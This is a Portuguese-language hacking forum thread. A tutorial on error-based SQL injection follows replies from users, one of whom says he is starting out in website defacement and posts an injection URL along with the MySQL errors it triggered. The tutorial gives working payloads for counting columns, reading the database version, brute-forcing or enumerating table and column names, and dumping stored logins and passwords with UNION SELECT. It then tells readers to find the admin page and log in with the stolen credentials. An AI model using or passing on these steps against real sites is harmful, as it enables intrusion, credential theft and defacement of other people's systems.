olá verificando essa sua técnica twi, para quem tem um certo conhecimento faz realmente facilmente essa técnica, essa sua é para um nivel acima de pessoas aprendendo e deveria ser mais explicada para que o pessoal todo do forum conseguisse entendeu, pois lembre-se que estamos lidando com pessoas de diversos conhecimentos.
Pare mim no meu nivel eu entendi e já utilizava e achei muito bacana, mais até para nós ficou um pouco vago algumas coisas como o hackeralp mostrou.
quando o erro cai num sintaxe assim da pra usar o SQLI ?? ponho o sinal de "-" antes do % ?? sem o % nao da erro no sql !!!
/produtos.php?categoria=%2527
to iniciando no defacer !!!!
qndo adiciono isso ao site tipo assim Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... cae neste erro aqui...
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ativo=1' at line 1SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ativo=1 LIMIT 0,25' at line 4
Fatal error: Call to a member function getCategoria() on a non-object in /var/www/html/produtos.php on line 127
Muito bom esse tuto, tive o privilegio de ver umas dessas aulas em que o twin ensina mais detalhadamente, valeu novamente twin abraços td de bom pra ti.
Primeiramente quero mostrar para vocês um site onde vocês poderam encontrar mais sobre novas vulnerabilidades, como se proteger de vulnerabilidades da web.
Um exemplo de erro: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/public_html/noticias/index.php on line 282
Essa falha é baseada em erros.
Vamos pegar o numero de colunas usando ORDER BY *
É usado dessa maneira:
Irão aparecer numeros, eles que nóis iremos subtituir por informações:
Precisamos encontrar a tabela do login agora, podemos usar Brute Force, ou então information_schema. O information_schema só funciona em databases MYSQL acima de versão acima de 5.0, para descobrir a versão use: version()
+union+all+select+1,version(),3
//--Brute Force--\\
Vamos tentar colocar tabelas até que não apareça erro:
UNION ALL SELECT * FROM ADMIN == erro
"" "" "" "" LOGIN == erro
"" "" "" "" USER == erro
"" "" "" "" USERS == erro
"" "" "" "" USUARIOS == sem erro
Então no caso ficaria assim: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Você pode usar: admin, admins, usuarios, usuario, user, users, user_name, username, login, adm, tb_usuarios, tb_admin ... entre outros.
Vamos agora descobrir as colunas de login, você pode usar as mesmas tecnicas de brute force e information_schema, no entanto information_schema é um pouco diferente:
Sintaxe = Exemplo: UNION ALL SELECT 1,COLUMN_NAME,3 FROM INFORMATION_SCHEMA.COLUMNS
Para passar de coluna pode usar o LIMIT também.
//
Agora continuando suponhamos que eu tenha pegado a tabela USUARIOS e as colunas LOGIN e SENHA, para pegar as informações de login e senha é so digitar eles no seu site, nos numeros visiveis, suponhamos que tenha parecido o 2 e 3 então vamos substituir eles pela informação:
UNION ALL SELECT 1,LOGIN,SENHA,3,4,5 FROM USUARIOS
Agora é só encontrar a area de login, geralmente fica em /admin , /adm/ , /administrator /login.php , ou você pode usar o acunetix ou algum outro tool para encontrar a area de login.
Ao encontra-la é só você se logar com as informações que você pegou
Comment